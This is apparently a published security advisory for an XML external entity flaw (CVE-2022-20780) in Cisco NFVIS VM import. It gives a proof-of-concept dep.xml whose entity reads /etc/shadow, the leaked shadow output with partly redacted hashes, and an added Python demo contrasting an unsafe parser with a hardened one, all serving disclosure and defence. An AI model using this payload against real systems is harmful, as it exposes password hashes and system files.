
Cisco Enterprise NFVIS - XML External Entity Injection Vulnerability (CVE-2022-20780)

High
orange-cert-cc published GHSA-hrpq-384f-vrpg May 6, 2022

Package

NFVIS (Cisco)

Affected versions

4.5.1-FC2

Patched versions

4.7.1

Description

Overview

ENCS has the capability to export VMs. Configurations and metadata are compressed together with the VM image into a .vmbkp archive when the vmExportAction command is requested.
The vmImportAction command is also available, allowing .vmbkp archives to be imported.

This import is vulnerable to XXE (XML External Entity injection), allowing system data to be leaked to the CLI and probably to the VM.

Details

The vmImportAction command expects a .vmbkp archive. This archive is a simple .tar.gz.
It must be composed of several files, one of them being dep.xml.

dep.xml is an XML configuration file describing the vm_lifecycle.

An attacker can add an external entity declaration to this XML file. This external entity will be resolved by the EncsManager.

Proof of Concept

In this example we inject the external entity into a variable field of a vm_group; the entity is declared so that it resolves to the contents of the /etc/shadow file.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]>
<vm_lifecycle xmlns="http://www.cisco.com/nfvis/vm_lifecycle">
  <tenants>
    <tenant>
      <name>admin</name>
      <deployments>
        <deployment>
          <name>ubuntu1</name>
          <vm_group>
            <name>ubuntu1</name>
            ...
            <config_data>
              ...
              <configuration>
                <dst>user-data</dst>
                ...
                <variable>
                  <name>xxe</name>
                  <val>&xxe;</val>
                </variable>
              </configuration>
            </config_data>
          </vm_group>
        </deployment>
      </deployments>
    </tenant>
  </tenants>
</vm_lifecycle>

This results in the contents of /etc/shadow being displayed in the running configuration.

encs-audit-n# show running-config vm_lifecycle tenants tenant admin deployments deployment ubuntu1 vm_group ubuntu1 config_data configuration variable xxe     
vm_lifecycle tenants tenant admin
 deployments deployment ubuntu1
  vm_group ubuntu1
   config_data configuration user-data
    variable xxe
     val [ "root:$6$TqVe9rHRx8kkXfb$<REDACTED>:18820:0:99999:7:::\nbin:*:18527:0:99999:7:::\ndaemon:*:18527:0:99999:7:::\nadm:*:18527:0:99999:7:::\nlp:*:18527:0:99999:7:::\nsync:*:18527:0:99999:7:::\nshutdown:*:18527:0:99999:7:::\nhalt:*:18527:0:99999:7:::\nmail:*:18527:0:99999:7:::\noperator:*:18527:0:99999:7:::\ngames:*:18527:0:99999:7:::\nftp:*:18527:0:99999:7:::\nnobody:*:18527:0:99999:7:::\nnginx:!!:18820::::::\nsystemd-network:!!:18820::::::\ndbus:!!:18820::::::\npolkitd:!!:18820::::::\nunbound:!!:18820::::::\nrpc:!!:18820:0:99999:7:::\ntss:!!:18820::::::\nqemu:!!:18820::::::\nsaslauth:!!:18820::::::\nopenvswitch:!!:18820::::::\nsshd:!!:18820::::::\ngeoclue:!!:18820::::::\nntp:!!:18820::::::\nchrony:!!:18820::::::\nrpcuser:!!:18820::::::\nnfsnobody:!!:18820::::::\nconsole:!!:18820:0:99999:7:::\ngluster:!!:18820::::::\nradvd:!!:18820::::::\nldap:!!:18820::::::\ndockerroot:!!:18820::::::\ntomcat:!!:18820::::::\npostgres:!!:18820::::::\ntcpdump:!!:18820::::::\npostfix:!!:18820::::::\nbird:!!:18820::::::\nadmin:$6$W56YPo/BPFohgh97$<REDACTED>:18820:0:99999:7:::\n" ]
    !
   !
  !
 !
!

Solution

Security patch

Upgrade to Cisco Enterprise NFVIS v4.7.1

Workaround

We recommend disabling external entity resolution in the XML parser.
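The workaround above, as an added example that is not Cisco's or Orange CERT-CC's code: a Python stand-in (the EncsManager's real parser is not known, so its behaviour is an assumption here) that parses a reduced dep.xml twice. The first parser has external general entity resolution enabled, which is the vulnerable setting and reproduces the leak against a constructed secret file instead of /etc/shadow; the second keeps resolution off and additionally fails closed on any DOCTYPE, on the assumption that a legitimate dep.xml never needs a DTD. The secret file, its contents and the `plain-value` placeholder are all constructed for the example.

```python
import io
import os
import tempfile
import urllib.parse
import xml.sax
from xml.sax import handler

# Constructed stand-in for a sensitive host file (the advisory's PoC reads /etc/shadow).
SECRET_CONTENT = "root:$6$constructed$NOTAREALHASH:18820:0:99999:7:::\n"


def build_dep_xml(target_path: str, with_doctype: bool) -> bytes:
    """Reduced dep.xml with the <variable> placement of the advisory's PoC;
    with_doctype=True mimics the malicious archive, False a benign one."""
    doctype, val = "", "plain-value"
    if with_doctype:
        uri = "file://" + urllib.parse.quote(target_path)
        doctype, val = f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{uri}"> ]>\n', "&xxe;"
    return (
        '<?xml version="1.0" encoding="UTF-8" standalone="no"?>\n' + doctype +
        '<vm_lifecycle xmlns="http://www.cisco.com/nfvis/vm_lifecycle">\n'
        "  <tenants><tenant><name>admin</name><deployments><deployment>\n"
        "    <name>ubuntu1</name><vm_group><name>ubuntu1</name>\n"
        "      <config_data><configuration><dst>user-data</dst>\n"
        f"        <variable><name>xxe</name><val>{val}</val></variable>\n"
        "      </configuration></config_data></vm_group>\n"
        "  </deployment></deployments></tenant></tenants></vm_lifecycle>\n"
    ).encode()


class VariableCollector(handler.ContentHandler):
    """Collects <variable><name>..</name><val>..</val></variable> pairs."""
    def __init__(self):
        super().__init__()
        self.variables, self._field, self._buf = {}, None, None

    def startElement(self, name, attrs):
        if name == "variable":
            self._buf = {"name": [], "val": []}
        elif self._buf is not None and name in self._buf:
            self._field = name

    def characters(self, content):
        if self._field:
            self._buf[self._field].append(content)

    def endElement(self, name):
        if name == self._field:
            self._field = None
        elif name == "variable":
            self.variables["".join(self._buf["name"])] = "".join(self._buf["val"])
            self._buf = None


class UntrustedDoctypeError(ValueError):
    pass


class RejectDoctype:
    """Lexical handler that fails closed: dep.xml has no legitimate need for a
    DTD (assumption), so any DOCTYPE aborts the import before content is read."""
    def startDTD(self, name, public_id, system_id):
        raise UntrustedDoctypeError(f"DOCTYPE {name!r} is not allowed in dep.xml")
    def endDTD(self): pass
    def startCDATA(self): pass
    def endCDATA(self): pass
    def comment(self, content): pass


def parse_unsafe(xml_bytes: bytes) -> dict:
    """Parser that resolves external general entities: the vulnerable setting."""
    collector, parser = VariableCollector(), xml.sax.make_parser()
    parser.setContentHandler(collector)
    parser.setFeature(handler.feature_external_ges, True)  # fetches file:// URIs
    parser.parse(io.BytesIO(xml_bytes))
    return collector.variables


def parse_hardened(xml_bytes: bytes) -> dict:
    """Parser with external entity resolution disabled and any DOCTYPE rejected."""
    collector, parser = VariableCollector(), xml.sax.make_parser()
    parser.setContentHandler(collector)
    parser.setFeature(handler.feature_external_ges, False)  # never fetch entities
    parser.setFeature(handler.feature_external_pes, False)
    parser.setProperty(handler.property_lexical_handler, RejectDoctype())
    parser.parse(io.BytesIO(xml_bytes))
    return collector.variables


def demo() -> tuple:
    """Returns (value leaked by the unsafe parser, whether the hardened parser
    rejected the malicious dep.xml, value it reads from a benign dep.xml)."""
    with tempfile.NamedTemporaryFile("w", prefix="xxe-demo-", delete=False) as fh:
        fh.write(SECRET_CONTENT)  # the "secret" file the entity points at
        secret = fh.name
    try:
        leaked = parse_unsafe(build_dep_xml(secret, True))["xxe"]
        try:
            parse_hardened(build_dep_xml(secret, True))
            rejected = False
        except UntrustedDoctypeError:
            rejected = True
        benign = parse_hardened(build_dep_xml(secret, False))["xxe"]
    finally:
        os.unlink(secret)
    return leaked, rejected, benign
```

Calling `demo()` returns the constructed secret as the `xxe` variable's value from the unsafe parser, `True` for the hardened parser having rejected the same document, and `plain-value` for the benign dep.xml, which shows that the hardening does not break normal imports. The two knobs are the same ones to look for in any parser stack: keep external general and parameter entity resolution off, and reject DOCTYPE outright where the format has no use for one (in Xerces-based Java parsers, for comparison, the `http://apache.org/xml/features/disallow-doctype-decl` feature does the latter).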

References

https://nvd.nist.gov/vuln/detail/CVE-2022-20780
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-NFVIS-MUL-7DySRX9

Credits

Orange CERT-CC
Cyrille CHATRAS at Orange group
Loic RESTOUX at Orange group
Pierre DENOUEL at Orange group

Timeline

Date reported: September 16, 2021
Date fixed: May 4, 2022

Severity

High (7.4 / 10)

CVSS base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: Required
Scope: Changed
Confidentiality: High
Integrity: None
Availability: None
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

CVE ID

CVE-2022-20780

Weaknesses